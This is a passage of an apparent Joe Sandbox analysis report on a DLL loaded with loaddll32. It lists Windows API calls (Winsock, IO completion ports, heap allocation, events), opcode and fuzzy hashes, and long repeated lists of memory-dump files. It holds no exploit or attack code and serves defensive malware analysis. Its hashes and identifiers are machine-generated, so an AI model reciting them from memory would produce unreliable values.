                              • Opcode Fuzzy Hash: c738d42ac253a6bd9f7e39f3c1f83ae6526de252afd47b644044ef8c90c1f983
                              • Instruction Fuzzy Hash: 2651AA713083408FE714CF28C994B6EBBF4AB99748F60092DF4A197A92D771E649CB53
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: _memmove
                              • String ID: &$I~l$I~l
                              • API String ID: 4104443479-2871971658
                              • Opcode ID: ecdf8038f33f11a5cf1a748a58f01fc3f37f64a094f23b3dac66fec53dfaf973
                              • Instruction ID: f41d952c4f5b56e971a450243784b29c5e813894cf02d8c3b5eb5809c1e1c5ec
                              • Opcode Fuzzy Hash: ecdf8038f33f11a5cf1a748a58f01fc3f37f64a094f23b3dac66fec53dfaf973
                              • Instruction Fuzzy Hash: FD419671E491599FCB02CEA999426FDBBF4AB06308F3455ABE461F7701D6309542CB90
                              APIs
                              • WSASetLastError.WS2_32(00000000,?,6CEB83C5,?), ref: 6CEB36FC
                              • WSAStringToAddressA.WS2_32(?,00000017,00000000,?,6CEB83C5,6CEB83C5), ref: 6CEB373B
                              • _memcmp.LIBCMT ref: 6CEB3776
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressErrorLastString_memcmp
                              • String ID: 255.255.255.255
                              • API String ID: 1618111833-2422070025
                              • Opcode ID: 90d7d69e59ff8d5eb7494f55dc670adb8b1c7e80d819b5c74f8080c30e0f2c8e
                              • Instruction ID: a253d66b7d063e562186a00460c0a53b467f9f7c12055c055393e80823c878e1
                              • Opcode Fuzzy Hash: 90d7d69e59ff8d5eb7494f55dc670adb8b1c7e80d819b5c74f8080c30e0f2c8e
                              • Instruction Fuzzy Hash: 5731D5B2A003199FDB208EA5C9817AF77B5EF8632CF30456DE96477B80DB7158458B80
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CEB23AC
                              • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF), ref: 6CEB241F
                              • GetLastError.KERNEL32 ref: 6CEB242C
                                • Part of subcall function 6CEB1A0E: __EH_prolog.LIBCMT ref: 6CEB1A13
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: H_prolog$CompletionCreateErrorLastPort
                              • String ID: iocp
                              • API String ID: 998023749-976528080
                              • Opcode ID: 04b71b1ebbaf92069911fbbded099eff29afe9d99adf6d32c9ef900f862d579b
                              • Instruction ID: e5b75ab9f25cfa1e6331ba947236826a6934319fcd72323bc76f638e06412198
                              • Opcode Fuzzy Hash: 04b71b1ebbaf92069911fbbded099eff29afe9d99adf6d32c9ef900f862d579b
                              • Instruction Fuzzy Hash: A0214C71800744DACB21DF6AC6045AEFBF8EFA5364F20461FE45293B90D774A609DF92
                              APIs
                              • _malloc.LIBCMT ref: 6CECC2B7
                                • Part of subcall function 6CECB71C: __FF_MSGBANNER.LIBCMT ref: 6CECB733
                                • Part of subcall function 6CECB71C: __NMSG_WRITE.LIBCMT ref: 6CECB73A
                                • Part of subcall function 6CECB71C: RtlAllocateHeap.NTDLL(01030000,00000000,00000001,00000000,00000000,00000000,?,6CED121A,?,?,?,00000000,?,6CED1107,00000018,6CEEAEA8), ref: 6CECB75F
                              • std::exception::exception.LIBCMT ref: 6CECC2D5
                              • __CxxThrowException@8.LIBCMT ref: 6CECC2EA
                                • Part of subcall function 6CECCCAA: RaiseException.KERNEL32(?,?,?,6CEEA73C,?,00000400,?,?,?,6CECC2EF,?,6CEEA73C,?,00000001), ref: 6CECCCFF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                              • String ID: ^l
                              • API String ID: 3074076210-2649338665
                              • Opcode ID: 717501f16262f5c244c50c01c0dd992f92c38cff826a49e209e13938724162e3
                              • Instruction ID: 8c2d985af81dee1007cd342686d599cd6ee941e1ac7f90c892bcfa89ae7c8cbf
                              • Opcode Fuzzy Hash: 717501f16262f5c244c50c01c0dd992f92c38cff826a49e209e13938724162e3
                              • Instruction Fuzzy Hash: 7AE0E53170020EA7DB04EBE4CE46EEE7B3DAB01248F300469E83466E90DB30D658D692
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CEB3FF9
                              • __localtime64.LIBCMT ref: 6CEB4004
                                • Part of subcall function 6CECAD70: __gmtime64_s.LIBCMT ref: 6CECAD83
                              • std::exception::exception.LIBCMT ref: 6CEB401C
                                • Part of subcall function 6CECAC43: std::exception::_Copy_str.LIBCMT ref: 6CECAC5C
                                • Part of subcall function 6CEBEA32: __CxxThrowException@8.LIBCMT ref: 6CEBEA88
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Copy_strException@8H_prologThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                              • String ID: p`l
                              • API String ID: 1621560660-1990446826
                              • Opcode ID: 5f19706add10e028de1d01f3672c14b169d78f0c515ddcdebb38e0607f176fe0
                              • Instruction ID: 793d233e509f023e8333f9ed128fa7bbd10feb3c19fa2bfc14585763d4b4cd60
                              • Opcode Fuzzy Hash: 5f19706add10e028de1d01f3672c14b169d78f0c515ddcdebb38e0607f176fe0
                              • Instruction Fuzzy Hash: AEE06DB6D4060D9BCB04DFA0CA027FEB738FB04348F60455DD820A7B90DB34A7498B92
                              APIs
                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6CEB4C5D), ref: 6CEC9B1F
                                • Part of subcall function 6CEB4ABB: __EH_prolog.LIBCMT ref: 6CEB4AC0
                                • Part of subcall function 6CEB4ABB: CreateEventA.KERNEL32(00000000,000000FF,6CEBF5E0,00000000), ref: 6CEB4AD2
                              • CloseHandle.KERNEL32(00000000), ref: 6CEC9B14
                              • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,6CEB4C5D), ref: 6CEC9B60
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6CEB4C5D), ref: 6CEC9C31
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
